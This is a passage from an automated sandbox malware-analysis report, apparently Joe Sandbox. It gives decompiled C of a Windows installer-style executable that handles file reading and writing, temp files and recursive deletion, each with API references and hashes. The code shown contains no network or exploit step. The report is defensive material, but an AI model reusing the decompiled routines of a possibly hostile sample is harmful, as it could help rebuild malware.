							} else {
								goto L44;
							}
						}
						if(_a16 <= 0) {
							goto L47;
						}
						while(1) {
							_t102 = _v12;
							if(_a16 < _t102) {
								_t102 = _a16;
							}
							if(E00403061(0x792458, _t102) == 0) {
								goto L44;
							}
							_t73 = WriteFile(_a8, 0x792458, _t102,  &_a12, 0); // executed
							if(_t73 == 0 || _t102 != _a12) {
								L30:
								_push(0xfffffffe);
								L45:
								_pop(_t68);
								return _t68;
							} else {
								_v8 = _v8 + _t102;
								_a16 = _a16 - _t102;
								if(_a16 > 0) {
									continue;
								}
								goto L47;
							}
						}
						goto L44;
					}
					_t74 = GetTickCount();
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x413ba0 = 0xb;
					 *0x413bb8 = 0;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L47;
					}
					while(1) {
						L10:
						_t103 = 0x4000;
						if(_a16 < 0x4000) {
							_t103 = _a16;
						}
						if(E00403061(0x792458, _t103) == 0) {
							goto L44;
						}
						_a16 = _a16 - _t103;
						 *0x413b90 = 0x792458;
						 *0x413b94 = _t103;
						while(1) {
							_t99 = _v16;
							 *0x413b98 = _t99;
							 *0x413b9c = _v12;
							_t78 = E00405DEC("/Fy");
							_v28 = _t78;
							if(_t78 < 0) {
								break;
							}
							_t104 =  *0x413b98; // 0x79d058
							_t105 = _t104 - _t99;
							_t79 = GetTickCount();
							_t100 = _t79;
							if(( *0x7c5754 & 0x00000001) != 0 && (_t79 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t106 = _t106 + 0xc;
								E00404D8E(0,  &_v92);
								_v20 = _t100;
							}
							if(_t105 == 0) {
								if(_a16 > 0) {
									goto L10;
								}
								goto L47;
							} else {
								if(_a12 != 0) {
									_t81 =  *0x413b98; // 0x79d058
									_v8 = _v8 + _t105;
									_v12 = _v12 - _t105;
									_v16 = _t81;
									L25:
									if(_v28 != 4) {
										continue;
									}
									goto L47;
								}
								_t83 = WriteFile(_a8, _v16, _t105,  &_v24, 0); // executed
								if(_t83 == 0 || _v24 != _t105) {
									goto L30;
								} else {
									_v8 = _v8 + _t105;
									goto L25;
								}
							}
						}
						_push(0xfffffffc);
						goto L45;
					}
					goto L44;
				}
			}

0x00402e63
0x00402e67
0x00402e6e
0x00402e71
0x00402e73
0x00402e73
0x00402e7c
0x00402e7f
0x00402e82
0x00402e84
0x00402e84
0x00402e8b
0x00402e90
0x00402e9b
0x00402e9b
0x00402ea6
0x00402ead
0x0040304f
0x0040304f
0x00000000
0x00402eb3
0x00402eb7
0x00402ff2
0x0040303f
0x00403041
0x00403041
0x0040304d
0x00403054
0x00403057
0x00000000
0x00000000
0x00000000
0x00000000
0x0040304d
0x00402ff7
0x00000000
0x00000000
0x00402ffe
0x00402ffe
0x00403004
0x00403006
0x00403006
0x00403012
0x00000000
0x00000000
0x0040301f
0x00403027
0x00402fec
0x00402fec
0x00403051
0x00403051
0x00000000
0x0040302e
0x0040302e
0x00403031
0x00403038
0x00000000
0x00000000
0x00000000
0x0040303a
0x00403027
0x00000000
0x00402ffe
0x00402ebd
0x00402ec3
0x00402ec3
0x00402eca
0x00402ed0
0x00402ed7
0x00402edd
0x00402ee0
0x00000000
0x00000000
0x00402eeb
0x00402eeb
0x00402eeb
0x00402ef3
0x00402ef5
0x00402ef5
0x00402f01
0x00000000
0x00000000
0x00402f07
0x00402f0a
0x00402f10
0x00402f16
0x00402f16
0x00402f21
0x00402f27
0x00402f2c
0x00402f33
0x00402f36
0x00000000
0x00000000
0x00402f3c
0x00402f42
0x00402f44
0x00402f51
0x00402f53
0x00402f81
0x00402f87
0x00402f90
0x00402f95
0x00402f95
0x00402f9c
0x00402fe0
0x00000000
0x00000000
0x00000000
0x00402f9e
0x00402fa1
0x00402fc3
0x00402fc8
0x00402fcb
0x00402fce
0x00402fd1
0x00402fd5
0x00000000
0x00000000
0x00000000
0x00402fdb
0x00402faf
0x00402fb7
0x00000000
0x00402fbe
0x00402fbe
0x00000000
0x00402fbe
0x00402fb7
0x00402f9c
0x00402fe8
0x00000000
0x00402fe8
0x00000000
0x00402eeb

APIs

GetTickCount.KERNEL32 ref: 00402EBD
GetTickCount.KERNEL32 ref: 00402F44
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F71
wsprintfA.USER32 ref: 00402F81
WriteFile.KERNELBASE(00000000,00000000,0079D058,7FFFFFFF,00000000), ref: 00402FAF

Strings

/Fy, xrefs: 00402F0A, 00402F1C
X$y, xrefs: 00402FF9
Xdy, xrefs: 00402E84
... %d%%, xrefs: 00402F7B
X$y, xrefs: 00402EE6

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$/Fy$X$y$X$y$Xdy
API String ID: 4209647438-3969685544
Opcode ID: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction ID: 5e4643fca21cfadc9de8a04f2b9c08e4ac3460f651f3ecbcf400e8ec413ecb9d
Opcode Fuzzy Hash: e581a1db5055c5a1f75047e6dbeb5af5b0b0b3ff451f60724f69a1395c480267
Instruction Fuzzy Hash: 0C51A17180121AEBCF10DF65DA48A9F7BB8AB04359F10413BF914B72C1D7789E40DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004056F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056F6(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004056fa
0x00405700
0x00405701
0x00405701
0x00405702
0x00405709
0x00405713
0x00405720
0x00405723
0x0040572b
0x00000000
0x00000000
0x0040572f
0x00000000
0x00000000
0x00405731
0x00000000
0x00405731
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405709
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405723

Strings

nsa, xrefs: 00405702

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: a41147e2ad70ab0e88512ae138b54e0503036a62734e23b080708fabd9fe5612
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 56F0A036348248BBEB104E55EC04B9B7FADDF91760F14C03BFA449B1C0D6B1995897A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x7c56d0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x7c168c =  *0x7c168c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x7c168c, 0x7530,  *0x7c1674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction ID: 92ca41f03990f75d421953f0ce28a402da3267ab35400c7ec7b801fcc1cee25f
Opcode Fuzzy Hash: d03ef6196a0a7671033119226856ac3e45730e14b7f79d2a7814547431d53b02
Instruction Fuzzy Hash: 510144316242109BE7081B389D08B6A3398E710328F14823FF841F36F1EA38DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004056C7, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E004056C7(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004056cb
0x004056d8
0x004056ed
0x004056f3

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004056A8, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004056A8(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x004056ac
0x004056b5
0x00000000
0x004056be
0x004056c4

APIs

GetFileAttributesA.KERNELBASE(?,004054B3,?,?,?), ref: 004056AC
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056BE

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 5b6c8abf5c6657dd1eb2aacdbb88165d5ef3b362f1ace4ec03089f8aa3a349a3
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: 07C04CB1818501ABDA015B24DF0D82F7F66EB60322B508F35F56DE00F0CB355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403061, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403061(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x00403065
0x00403078
0x00403080
0x00000000
0x00403087
0x00000000
0x00403089

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EAB,000000FF,00000004,00000000,00000000,00000000), ref: 00403078

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 6f2b57ed93274e24fd49225d19a01d35385a3562131b0f82fbcc89c4f8353da0
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: 9CE08631111118BBDF209F61DC00A977B6CEB05362F008036FE44E6190D530DA10DBB9

Uniqueness

Uniqueness Score: -1.00%

Function 004030AA, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004030AA(void* __eflags) {
				void* _t2;
				void* _t5;

				E00405C52(0x7f8000);
				_t2 = E00405550(0x7f8000);
				if(_t2 != 0) {
					E004054E3(0x7f8000);
					CreateDirectoryA(0x7f8000, 0); // executed
					_t5 = E004056F6(0x7f6000, 0x7f8000); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030b1
0x004030b7
0x004030be
0x004030c3
0x004030cb
0x004030d7
0x004030dd
0x004030c1
0x004030c1
0x004030c1

APIs

Part of subcall function 00405C52: CharNextA.USER32(?,*?|<>/":,00000000,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CAA
Part of subcall function 00405C52: CharNextA.USER32(?,?,?,00000000), ref: 00405CB7
Part of subcall function 00405C52: CharNextA.USER32(?,007F8000,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CBC
Part of subcall function 00405C52: CharPrevA.USER32(?,?,007EE000,007F8000,00000000,004030B6,007F8000,00000000,00403228), ref: 00405CCC

CreateDirectoryA.KERNELBASE(007F8000,00000000,007F8000,007F8000,007F8000,00000000,00403228), ref: 004030CB

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction ID: 9f9433c174eaf46919c8f2835a4fc40c5a78850b628f18ddb5a9b5ca7a4d18ad
Opcode Fuzzy Hash: 111660282cd05cd50599e1b32aefeb5d230e43eccb9162907ef5bd7ffee1ca02
Instruction Fuzzy Hash: 7FD0C92151BD3031D9A2376A7D06FDF064C9F0272AF51447BFA04B52CA9E6C1A8209EE

Uniqueness

Uniqueness Score: -1.00%

Function 00403093, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403093(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004030a1
0x004030a7

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 004030A1

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040345F, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040345F() {
				void* _t1;
				void* _t5;
				signed int _t7;

				_t1 =  *0x409014; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t7 =  *0x409014;
				}
				E004034A4();
				return E00405315(_t5, _t7, 0x7fa000, 7);
			}

0x0040345f
0x00403467
0x0040346a
0x00403470
0x00403470
0x00403470
0x00403477
0x00403488

APIs

CloseHandle.KERNEL32(FFFFFFFF,004032CF,00000000), ref: 0040346A

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 159b179e4e6bc8d029fc7358266d2ddecdae431e3d30438ef32694cccd85c7ef
Instruction ID: 27fcf4ef6b82d90fa6b76e5efc9ad2767cda243669389ec156f82050e5a0f542
Opcode Fuzzy Hash: 159b179e4e6bc8d029fc7358266d2ddecdae431e3d30438ef32694cccd85c7ef
Instruction Fuzzy Hash: 3FC01270504A0096D2206FB59E4A9297A185B80336B908735B1B5F41F2C7BC5901493E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405315, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405315(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055C4(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72);
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x7c5728 =  *0x7c5728 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059F0(0x7b84b8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E0040552A(_t72);
					} else {
						lstrcatA(0x7b84b8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x7b84b8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E0040550E( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059F0(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004056A8(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D8E(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x7c5728 =  *0x7c5728 + 1;
										} else {
											E00404D8E(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040573E();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405315(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
